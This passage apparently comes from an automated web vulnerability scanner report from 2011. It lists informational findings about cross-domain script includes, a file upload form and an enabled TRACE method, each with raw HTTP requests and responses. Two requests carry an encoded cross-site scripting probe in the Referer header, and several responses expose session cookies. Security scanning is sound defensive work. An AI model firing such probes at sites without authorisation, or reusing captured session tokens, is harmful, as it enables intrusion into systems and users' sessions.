<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- PageID 1 - published by
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAuYyvux-ecD-iwkh4feVj2hRy-Dv9CBhWZFnV54OXruV3WxevShSOki_3aL3UnU5umqAVoxcixSt6LA"></script>
...[SNIP]...
</script>
<script src="http://api.wipmania.com/jsonp?callback=jsonpCallback" type="text/javascript"></script>
...[SNIP]...
<div id="tab1banners">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

23.654. http://www.unmannedspaceflight.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.unmannedspaceflight.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.unmannedspaceflight.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:41 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.5 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8b
X-Powered-By: PHP/5.2.5
Set-Cookie: session_id=47217f8154e2e2ad81f66ad14c4bf133; path=/; httponly
Connection: close
Content-Type: text/html
Content-Length: 87221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

23.655. http://www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walmart.com
Path:   /cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cp/Electronics/3944 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15
Last-Modified: Sun, 30 Jan 2011 01:50:12 GMT
Content-Language: en-US
Content-Type: text/html;ISO-8859-1;charset=ISO-8859-1
Cache-Control: private, max-age=68
Expires: Sun, 30 Jan 2011 02:05:12 GMT
Date: Sun, 30 Jan 2011 02:04:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=0; path=/; domain=.walmart.com
Via: HTTP/1.1 ew333 (ew333_7412093952_69769216)
Content-Length: 69886

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<title>Electronics, TV&#039;s, Laptops, Digital Cameras, MP3 and DVD Players - Wal
...[SNIP]...
<!-- Site Header start -->
<script src="http://i2.walmartimages.com/js/rollups/catalog.jsp" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://i2.walmartimages.com/js/ajaxVerBreadcrumbs.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script language="JavaScript" type="text/javascript" src="http://i2.walmartimages.com/webanalytics/omniture/s_code.js">
</script>
...[SNIP]...
</IFRAME>
<script type="text/javascript" src="http://cts.channelintelligence.com/841291_landing.js"></script>
...[SNIP]...
<!-- OPINIONLAB ENGINE JS; NECESSARY FOR ALL IMPLEMENTATIONS -->
<script src="http://i2.walmartimages.com/js/opinionlab/oo_engine_c.js" type="text/javascript"></script>
<!-- FEEDBACK PLUG-IN ; INLINE FEEDBACK LINK SURVEY -->
<script src="http://i2.walmartimages.com/js/opinionlab/oo_conf_en-US_inline.js" type="text/javascript"></script>
...[SNIP]...

23.656. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walmart.com
Path:   /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: max-age=0
Last-Modified: Sun, 30 Jan 2011 02:03:54 GMT
Expires: Sun, 30 Jan 2011 02:03:54 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Sun, 30 Jan 2011 02:03:54 GMT
Content-Length: 12096
Connection: close
Set-Cookie: cef.env=PROD; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.visitor=12965524989; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.anoncart=129655249891685177; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
Set-Cookie: spcf.backup="|com.wm.anoncart:129655249891685177|:|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: WMSessionID=00000005d1b5c98a3fee429a173ace0a3fdb68dfdf66d4a6_1296353034111_SSL207_10-15-140-49_1296353034111_11.1_N_; Domain=.walmart.com; Path=/
Set-Cookie: cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
Set-Cookie: com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1296353034113@firstcreate:1296353034113"; Version=1; Domain=.walmart.com; Path=/
Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907962045525d5f4f58455e445a4a423660;path=/
Set-Cookie: SSLB=0; path=/; domain=.walmart.com
Via: HTTP/1.1 ew29 (ew29_7330869248_34521600)

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<head>
<title> - Walmart</title>
<link href="http://i2.walmartimages.com/css/global.css" rel="stylesheet" typ
...[SNIP]...
<![endif]-->
<script src="http://i2.walmartimages.com/js/rollups/catalog.jsp" type="text/javascript"></script>
...[SNIP]...
<!-- End: Module G4080: Global Footer -->
<script type="text/javascript" src="http://cts.channelintelligence.com/841291_landing.js"></script>
...[SNIP]...
<!-- OPINIONLAB ENGINE JS; NECESSARY FOR ALL IMPLEMENTATIONS -->
<script src="http://i2.walmartimages.com/js/opinionlab/oo_engine_c.js" type="text/javascript"></script>
<!-- FEEDBACK PLUG-IN ; INLINE FEEDBACK LINK SURVEY -->
<script src="http://i2.walmartimages.com/js/opinionlab/oo_conf_en-US_inline.js" type="text/javascript"></script>
...[SNIP]...

23.657. http://www.youtube.com/embed/CKZzn00w01M

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/CKZzn00w01M

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /embed/CKZzn00w01M HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:03 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 9225

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Egyptian Cartoonist Operates Just Under the Censorship Radar</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflPrz
...[SNIP]...
</div>


<script src="//s.ytimg.com/yt/jsbin/www-embed-vfl3l2TAa.js"></script>
...[SNIP]...

23.658. http://www.youtube.com/embed/mm8byzo8zWE

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/mm8byzo8zWE

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /embed/mm8byzo8zWE HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:03 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 9216

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Interview with Australian Cartoonist Peter Broelman</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css">
...[SNIP]...
</div>


<script src="//s.ytimg.com/yt/jsbin/www-embed-vfl3l2TAa.js"></script>
...[SNIP]...

23.659. http://www.zacks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zacks.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:04:12 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=6ssok6pvga1gucejl91shelqj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 02:04:12 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 133254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- DC_PAGE_ID: 1, ADID: -->
<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296353052?"></script>
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296353052?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296353052?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296353052?"></script>
...[SNIP]...
<!-- begin ad tag (tile=1) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=2) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=3) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<div style="margin:20px 0;">

<script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296353052?"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.660. http://www.zacks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zacks.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:19:50 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=v9l41qn4sfm5i3kja133sovjj3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 03:19:49 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=4ac75f419ad0fd716a2409a04430b66c; expires=Sun, 06-Feb-2011 03:19:50 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 03:19:49 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 03:19:49 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=4ac75f419ad0fd716a2409a04430b66c; expires=Sun, 06-Feb-2011 03:19:50 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 03:19:49 GMT; path=/; domain=.zacks.com
Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 03:19:50 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 135895

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- DC_PAGE_ID: 1, ADID: -->
<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296357590?"></script>
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296357590?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296357590?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296357590?"></script>
...[SNIP]...
<!-- begin ad tag (tile=1) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=2) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=3) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<div style="margin:20px 0;">

<script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296357590?"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.661. http://www.zacks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zacks.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:48:34 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=e7js0gkplf59jff79ik50r1am6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 17:48:33 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=597eac166ff42894d51e61aee57128a8; expires=Sun, 06-Feb-2011 17:48:34 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 17:48:33 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 17:48:33 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=597eac166ff42894d51e61aee57128a8; expires=Sun, 06-Feb-2011 17:48:34 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 17:48:33 GMT; path=/; domain=.zacks.com
Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 17:48:34 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 135362

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- DC_PAGE_ID: 1, ADID: -->
<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296409714?"></script>
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296409714?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296409714?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296409714?"></script>
...[SNIP]...
<!-- begin ad tag (tile=1) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=2) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=3) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<div style="margin:20px 0;">

<script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296409714?"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

23.662. http://www.zacks.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zacks.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 19:13:49 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=61fk8pd6se6l39ij7o2j28tfb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 19:13:48 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=aea77f780fcb1525ac2486dbd36de044; expires=Sun, 06-Feb-2011 19:13:49 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 19:13:48 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 19:13:48 GMT; path=/; domain=.zacks.com
Set-Cookie: user_session=aea77f780fcb1525ac2486dbd36de044; expires=Sun, 06-Feb-2011 19:13:49 GMT; path=/; domain=.zacks.com
Set-Cookie: CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 19:13:48 GMT; path=/; domain=.zacks.com
Set-Cookie: cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 19:13:49 GMT; path=/; domain=.zacks.com
Connection: close
Content-Type: text/html
Content-Length: 134779

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- DC_PAGE_ID: 1, ADID: -->
<html lang="en">
<head>
<meta http-equiv="refresh" content="300
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=2;tile=1;sz=292x18;homepage=true;ord=1296414829?"></script>
...[SNIP]...
<td width=40%><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/textlinks;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=3;tile=2;sz=292x18;homepage=true;ord=1296414829?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=5;tile=3;sz=120x240;homepage=true;ord=1296414829?"></script>
...[SNIP]...
<p><script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/verticals;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=6;tile=4;sz=120x240;homepage=true;ord=1296414829?"></script>
...[SNIP]...
<!-- begin ad tag (tile=1) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=1;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=2) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=2;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<!-- begin ad tag (tile=3) -->
<script language="JavaScript" src="http://ad.doubleclick.net/adj/zackssponsor/;key=58754;tile=3;sz=120x60;ord=[timestamp]?" type="text/javascript"></script>
...[SNIP]...
<div style="margin:20px 0;">

<script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/zacks.dart/lrec;section=homepage;subsection=zcom_new;!category=none;partner=DEFAULT;pos=15;tile=5;sz=336x280;homepage=true;ord=1296414829?"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

24. File upload functionality

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sstatic.net
Path:   /Js/wmd.js

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:

Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:

You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

Request

GET /Js/wmd.js?v=508538fa9757 HTTP/1.1
Host: sstatic.net
Proxy-Connection: keep-alive
Referer: http://stackoverflow.com/questions/4843433/php-facebook-like-box-being-able-to-like-the-current-page-using-dynamic-url
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: application/x-javascript
Last-Modified: Sun, 30 Jan 2011 11:16:50 GMT
Accept-Ranges: bytes
ETag: "c48fee306fc0cb1:0"
Vary: Accept-Encoding
Date: Sun, 30 Jan 2011 15:12:40 GMT
Content-Length: 39657

var Attacklab=Attacklab||{};var Attacklab=Attacklab||{};Attacklab.showdown=Attacklab.showdown||{};Attacklab.prePreviewHtmlHook=function(a){return a};Attacklab.postPreviewHtmlHook=function(a){return a}
...[SNIP]...
<div style='position: relative' id='upload-file-input'> <input type='file' name='filename' id='filename-input' value='browse' style='border:0; font-size:18px; position:relative; text-align:right; -moz-opacity:0; filter:alpha(opacity: 0); opacity: 0; z-index: 2;'> <img src='http://i.imgur.com/GKc7H.png' height='15px' width='15px' style='position: absolute; left: 38px; top: 11px;'>
...[SNIP]...

25. TRACE method is enabled
There are 32 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


25.1. http://advertising.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /

Request

TRACE / HTTP/1.0
